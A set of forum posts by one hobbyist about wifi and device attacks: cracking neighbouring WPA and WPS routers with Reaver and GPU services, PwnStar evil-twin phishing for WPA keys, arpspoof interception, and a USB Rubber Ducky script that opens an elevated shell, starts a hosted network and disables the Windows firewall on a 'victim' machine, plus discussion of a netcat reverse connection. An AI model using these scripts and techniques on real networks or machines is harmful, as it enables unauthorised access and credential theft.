michael_kent123

There are tons of YouTube videos which show how it's possible to overcome the iPhone lock. Typically, however, one can only access e-mail or post to Twitter or see photos. I think the answer to my question is "no" but I'm wondering if there are any hacks that allow access to the "settings" menu once the lock has been bypassed? I'm referring to any kind of iPhone 5 or 6. Thanks.

I downloaded Router Keygen onto my Android tablet. However, all networks were considered "unsupported". I am surrounded by BTHomeHubs, SKY, and TalkTalk. These may well be Broadcom which are not supported by Router Keygen which targets Thomspon routers. What do you mean by "Europe"? For example, I am in the UK which is Europe. Do you mean continental Europe e.g. France, Spain, Italy, etc?

Yes, I've noticed that often a MAC address will have some similarities to the BSSID. I didn't realise that it might be possible to compute the WPA password from the MAC or BSSID.

Does anyone know what Router Keygen actually does: http://router-keygen.en.uptodown.com/ Apparently, "Router Keygen for Windows interface is very simple. In the main window you'll have three tabs separating all the WiFi networks that can be found in your vicinity: on one side the ones supported by Router Keygen, on another the ones probably not supported, and finally the ones that you're sure not to be able to decrypt." I don't understand what this means. The program is a nightmare to setup in Ubuntu so I don't want to spend anymore time on it unless it's actually interesting. Perhaps someone can spell out to me what this program does.

@IrishFavor Thanks for the suggestions. So, if I understand correctly: a) root the Android tablet - http://www.cnet.com/how-to/how-to-easily-root-an-android-device/ b) install Linux Deploy - https://play.google.com/store/apps/details?id=ru.meefik.linuxdeploy&hl=en c) install Kali image - http://www.kali.org/how-to/kali-linux-android-linux-deploy/

Just wondering if anyone has anything to add on this topic?

I recently used a Windows tool called Dumpper (correct spelling) which claims to know the default WPS pins for a variety of routers. See: http://sourceforge.net/projects/dumpper/ To say that it did not work, is an understatement. I would think that if there were default WPS pins then there would be no need for a tool like Reaver. Does anyone know more about this? Do / did certain routers ever have default pins?

I have a Sanei N77 tablet that runs Android OS. See: http://www.saneimall.com/ It has a mini USB. In Android, I can connect Kali Live USB to the mini USB cable. The OS recognizes the USB. Does anyone know if it is possible to boot into Kali (or, for that matter, into any live USB)? Since there is no keyboard, there is no opportunity to press F2 (as I do with my laptop) to enter the BIOS and change the boot order. Thanks.

Is there anything else UK based that you recommend? I did go to a few 2600 London meetings but was not too impressed. It seemed to be people who just liked to drink. I also went to DEFCON 4420 in London but found it quite cliquey (lots of people who already knew each other).

Thanks for your helpful and informative comments. So you are saying that most users these days use default passwords provided by the manufacturer - but that these are very hard to brute force because they are not based on any kind of dictionary words. Correct? If so, this will be an example where not changing the default password is best. When I looked at my friend's PlusNet wireless router, the default was a random 12 digit uppercase hex number e.g. "DD01FE17FAA5". He didn't change the default. I suppose it could be bruteforced but even commercial crackers like gpuhash.me charge 0.58BTC and that's for 10 digit hex (uppercase or lowercase). One thing I was wondering is whether there is a website that lists the default PSK style for all routers. The gpuhash.me lists a few (https://gpuhash.me/?menu=en-tasks-add): Often used as a default WPA password for broadband routers: 10 digits — 2WIRExxx, ONOxxxx, ATTxxx, BigPondxxx 8 lowercase — virginmedia 8 uppercase — SKYxxx, UPCxxxxxxx 10 HEX lowercase — BTHomeHub(1-4)-xxxx There must be some standard for all routers. For example, even if all PlusNet routers are 12 hex uppercase, an adversary with significant GPU power (e.g. a government) could surely crack all default router passwords given time? I agree. At the same time, however, it is worth noting that the Reaver forums are active (whether the Kali Linux forum or the Google Code page where Reaver is hosted). There is now a fork of Reaver (https://code.google.com/p/reaver-wps-fork/). I can't imagine it can be 100% dead - maybe 97%. But is it worth spending time on? Probably not. My impression is that there are two options. You either provide the same SSID and hope that your Tx power is superior to the target's. Or you end up with two very similarly named systems and hope that the target chooses your open network as he is fed up with being unable to connect to his genuine WPA(2) system due to the ongoing deauth attack. Once the target connects to you, PwnStar serves them a page which tells them there is a router error and asks them to input their WPA(2) PSK. This requires the user to a) manually connect to the attacker's open network; b) know their own PSK (which should be on the router but they may not know this; c) be willing to enter it. PwnStar then either provides internet access or does not provide internet access in which case the webpage just goes into a loop back to the phishing page every time the user requests a website. The router phishing page is an addition to PwnStar (https://forums.kali.org/showthread.php?21114-New-WPA-Phishing-system-using-pwnstar9-0-released-for-general-use). Any more comments or suggestions?

Thanks for posting these. Having visited Sheffield, I understand the "Steel" name. Since you are UK based, what other UK cons would you recommend?

Oddly enough, I referenced that link in the third line of my post.

Hello, I want to comment on how I understand WPA(2) cracking based on the situation today. In my opinion, there are three ways to target WPA(2). a) PSK dictionary cracking. b) WPS cracking. c) Social engineering. a) My opinion is that PSK dictionary cracking is unlikely to work. As an experiment, I acquired the 4-way handshake of ten APs in the vicinity. I uploaded these to gpuhash.me. No PSKs were found. The site claims that they use a 337 million word dictionary. Moxie Marlinspike's cloudcracker.com uses a 604 million word dictionary but charges $17 per attempt whether successful or unsuccessful. gpuhash.me only charge if they are successful. My impression is that most people these days use non-dictionary passwords. Of note, most routers that I can see in my area have default SSIDs. For example, I observer various BTHomeHub2-XXXX, BTHub3-XXXX, and SKYXXXXX names. I am in the UK. The default SSIDs may suggest that the owners also use default passwords. According to gpuhash.me "Full range of 10 hexadecimal lowercase digits (0000000000-ffffffffff). Often used as a default WPA password for broadband routers: BTHomeHub(1-4)-xxxx." These attempts demand energy and hence are expensive. The lowercase 10 hex attack is 1100GB worth of keywords. gpuhash.me requests 0.58BTC which is currently $176 or £111. And, of course, there is no guarantee that the default password has not been changed. b) In my opinion, the main WPS cracking tool, Reaver, is effectively dead. First, the target router must be WPS enabled. Many are not. Checking the number of routers discovered by airodump-ng compared to those recorded by wash, will indicate that about 50% of routers cannot be targeted by the WPS attack. Then, of those that can, the majority time out due to WPS locking. Even those that do not lock have other errors. They may get stuck at 90.90% or 99.99%. In these scenarios, Reaver does not discover the first four digits of the WPS PIN and goes into a loop. I am currently playing with the Reaver fork, version 1.5, but am not optimistic that it will improve matters (based on users' comments) (https://code.google.com/p/reaver-wps-fork/). After all, the issue is not Reaver, but with how routers now function whether they are sold new or have had firmware updates. This is not to say that Reaver is always ineffective. As Digininja notes, an organisation with 100 APs might have one that is vulnerable (https://forums.hak5.org/index.php?/topic/33715-is-reaver-totally-dead/). However, if there is only one AP, the likelihood of success is minimal. c) AIUI, the main tool is PwnStar (https://github.com/SilverFoxx/PwnSTAR). You create an open network (a softAP) with the same SSID as that of the network you are targeting. You deauth the client from the genuine AP using airplay-ng. The user then attempts to reconnect to his network but accidentally connects to you because your SSID shows up in the network list and its Tx power is superior to that of the genuine router. This attack requires the user to manually connect to an open network rather than their real WPA(2) network. My impression is that the user has to manually connect because their real SSID uses WPA(2) and hence, after the deauth, their system will not automatically connect to an open network (even one that uses the same SSID). A variation, promoted by Musket Teams on the Kali Linux forums, is to use a very similar SSID. In other words, if the real SSID is "SKY12345" the softAP SSID would be "SKY12345 ." (five spaces then a dot). AIUI, the idea is that the target's system will start to send out probe requests to open networks to which it previous connected, and the attacker system claims it is one of these networks. (It's not therefore necessary for the SSID to be so similar but the Musket Teams idea looks good for social engineering purposes). However, my impression is that modern systems are less likely to automatically connect. For example, if I deauth myself (on a different computer) from a Windows 8 system, it will not then connect to any open systems in the vicinity even if I had connected to them before. The only way is to manually connect. I would appreciate any comments on the above scenarios. Further, perhaps there are other WPA(2) attacks that can obtain the PSK of which I am unaware. Thanks!

What do these tools do that Reaver cannot do?

Hello, I am able to boot into the live version of Kali but cannot achieve persistence. I follow http://docs.kali.org/installation/ka...sb-persistence changing where necessary (the .iso and location of my usb). In Ubuntu 12.04, I run: dd if=kali-linux-1.0.9-i386.iso of=/dev/sdc bs=1M My USB is on /dev/sdc. I then can boot into Kali with no problems at start-up. However, I then enter Ubuntu and run as root (after su): size=5gb read bytes _ < <(du -bcm /home/name/kali-linux-1.0.9-i386.iso |tail -1); echo $bytes parted /dev/sdc mkpart primary $bytes $size mkfs.ext3 -L persistence /dev/sdc1 e2label /dev/sdc1 persistence mkdir -p /mnt/my_usb mount /dev/sdc1 /mnt/my_usb echo "/ union" > /mnt/my_usb/persistence.conf umount /dev/sdc1 I then try to run Kali from boot and am informed that it "failed to load ldlinux.c32". There are three directories on my USB: EFI, install, and live. I added ldlinux.c32 from http://rufus.akeo.ie/downloads/ to EFI/BOOT but still received the same error. Df after I've tried to add persistence shows: /dev/sdc2 61682 58670 3012 96% /media/Kali Live I am obviously doing something wrong. What? Many thanks!

I have experimented with Reaver over the past few days. In my opinion, this tool is dead. The first reason is that only a percentage of routers can be WPS attacked. Compare the outputs from airodump-ng and wash. There might be 20 WPA networks shown in airodump-ng but only 8 will be WPS crackable as shown by wash. The second reason is that all (?) routers now have WPS locking. I have spent considerable time with Reaver's various options such as -E (eap-terminate), -L (ignore WPS locks), -t (timeout period), -A (no associate; do so via aireplay-ng), and -d (set delays between pin attempts). Without fail, I always get either: [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking [or any other length I set] WPS transaction failed (code: 0x02), re-trying last pin I have tried the ReVdK3-r1.sh script. This did not work as it prevented Reaver from associating with APs. I also tried running mdk3 manually with Reaver on. Again, same problem: no association. I have used mdk3 in the past to unlock a locked router. However, once I tried Reaver again, after a few attempts the router just locked itself as before. The issue is how to prevent locking in the first place. My impression is that there is no way to avoid this. If the router is designed to lock, it will lock. So, I ask the simple question. Is Reaver 100% dead? If not, is there any viable way to use it? Can anyone paste options that have been shown to work recently? Thanks.

Is your IP address on the same network in the VM as that of your Macbook (which is presumably connected to your router). In other words: did you use bridged mode or NAT mode in the VM? Also, I don't see why you are using 3) and 4). Try: arpspoof -i interface gateway_IP (this should intercept all IP addresses that send traffic to the router).

I don't understand your problem. If you set the --bssid then of course you will only see client(s) of that particular AP. If the client is unassociated, then this is because it is searching for an AP. See: http://www.aircrack-ng.org/doku.php?id=airodump-ng

I have a question about the txpower of wireless cards. In this case, I am using the Alfa Awus 036H on wlan1. I use the iw reg set BO command to tell my system that I'm in Bolivia. This allows me to use iwconfig wlan1 txpower 30. Previously I could use a maximum txpower of 20. My question is: how is this useful? From what I've read, if I create a soft AP with airbase-ng, then a higher txpower makes my transmissions more likely to override those of the genuine AP. When else is a higher txpower helpful? Does it work with ARPspoofing. If I am sending out packets saying "192.168.1.1 (the router) is located at MAC 11:22:33:44:55:66", is it beneficial to have a higher txpower? Are there any other situations when a higher txpower is beneficial?

I suspect that the majority of people who use webmail use Gmail, Yahoo, Hotmail / Outlook, or AOL. However, there are hundreds of other services out there. I don't mean niche services that cater for privacy-minded people but inferior versions of Gmail. Here is one example: http://www.lpemail.com/ And another: http://registration.myway.com/primary_login.jsp?regarea=email&return_url=http://my.myway.com/email_redir.jsp Here are my questions: 1. How do such services make money for their owners? They cannot have that many users. Who wants to sign up for a service with 125MB of space (like Myway). Will they really make enough cash from advertising? 2. How easy would it be to set-up a webmail provider in which each account had 1GB of space. In other words: a poor man's Gmail. What would one have to do? How much would it cost (highly speculative question!)

Perhaps I am missing something obvious. I run the script on the target. This creates the new wireless network. On my machine, I disconnect from whatever network I am connected to. I then connect to the new wireless network created on the victim machine. Is this correct? Thanks.

Just to expand on the above. I have used the ducky code successfully on one Windows 8 machine. The script creates a network which I connect to (with a Blackberry) and receive a 192.168.x.x address. However, on another Windows 8 machine, the script also creates the network. Yet, whenever I try to connect to the network from my Ubuntu machine, I can never obtain a connection. I also try via the Blackberry but it also will not connect. It just times out / deauthenticates itself. When the script runs on the second Windows machine, all looks fine. I see the commands being run and accepted in the Windows terminal. Does anyone have any ideas? Why would it work on one Windows but not on the other?

Hello, I have a problem with the following ducky script. DELAY 3000 GUI r DELAY 2000 STRING powershell Start-Process cmd -Verb runAs DELAY 1000 ENTER DELAY 10000 LEFTARROW ENTER DELAY 2000 STRING netsh wlan set hostednetwork mode=allow ssid=network key=whatever ENTER DELAY 2000 STRING netsh wlan start hostednetwork ENTER DELAY 2000 STRING netsh firewall set opmode disable ENTER DELAY 2000 STRING exit ENTER I do what Darren does in "What's Up With the Duck?": The duck script seems to work on the target machine. The network 'network' is created. However, when I connect to 'network' from my machine and enter the password, the connection always times out. This is what a successful connection from me to my AP looks like: [68488.324824] wlan0: authenticate with b1:cd:00:12:a7:88 [68488.332390] wlan0: send auth to b1:cd:00:12:a7:88 (try 1/3) [68488.334924] wlan0: authenticated [68488.338097] wlan0: associate with b1:cd:00:12:a7:88 (try 1/3) [68488.341976] wlan0: RX AssocResp from b1:cd:00:12:a7:88 (capab=0x411 status=0 aid=2) [68488.352677] wlan0: associated [68488.352980] cfg80211: Calling CRDA for country: AL [68488.362972] cfg80211: 2402000 KHz - 2482000 KHz @ 20000 KHz), (N/A mBi, 2000 mBm) [68488.362978] cfg80211: Regulatory domain changed to country: AL [68488.362979] cfg80211: (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp) [68488.362981] cfg80211: (2402000 KHz - 2482000 KHz @ 20000 KHz), (N/A, 2000 mBm) [...] I disconnect deliberately: [68529.914912] wlan0: deauthenticating from b1:cd:00:12:a7:88 by local choice (reason=3) [68529.970614] cfg80211: All devices are disconnected, going to restore regulatory settings [68529.970621] cfg80211: Restoring regulatory settings Here is what happens when I connect to 'network'. [69302.952696] wlan0: authenticate with 21:32:12:7a:40:42 [69302.968746] wlan0: send auth to 21:32:12:7a:40:42 (try 1/3) [69302.970611] wlan0: authenticated [69302.971105] wlan0: associate with 21:32:12:7a:40:42 (try 1/3) [69302.981330] wlan0: RX AssocResp from 21:32:12:7a:40:42 (capab=0x431 status=0 aid=1) [69302.992791] wlan0: associated [69302.993017] cfg80211: Calling CRDA for country: AL [69302.999402] cfg80211: Updating information on frequency 2412 MHz for a 20 MHz width channel with regulatory rule: [69302.999408] cfg80211: 2402000 KHz - 2482000 KHz @ 20000 KHz), (N/A mBi, 2000 mBm) [...] I am deauthenticated involuntarily: [69348.297397] wlan0: deauthenticating from 21:32:12:7a:40:42 by local choice (reason=3) [69348.373035] cfg80211: All devices are disconnected, going to restore regulatory settings [69348.373042] cfg80211: Restoring regulatory settings I don't see any difference between a successful connection to my AP and an unsuccessful connection to the target machine. The target is a Windows 8 box. Does anyone know why I cannot connect to 'network'. Thanks!

Hello, In 15.01 - "What's up with the Duck?" - Darren runs the ducky script which loads netcat on a victim's Windows machine and makes a connection to his netcat listener on his Ubuntu box. I've uploaded a screenshot of Darren's screen here: http://bayimg.com/bANKBaAfn I'm unclear about three aspects. 1. Darren's IP is 173.214.161.228. (ssh dk@173.214.161.228). However, http://173.214.161.228 provides a website for Dreamstreet Home Loans in Australia. Why is this? I assume that Darren has rented space on this VPS along with any number of other organisations / firms? 2. Darren runs netcat from dk@vps. I think that he is running the netcat from the VPS rather than from his own system? Is it normal to have netcat set-up on a VPS? 3. Netcat is listening on 0.0.0.0:8002. What does 0.0.0.0 mean in this context. It's something to do with "all interfaces" but please explain in a simple fashion! What I mean is: is Netcat listening on the VPS or on Darren's system or on both? Thanks!

I suppose the idea is that - considering the computer is in use - it would be being used by an "admin" member (i.e. the person who owns the laptop).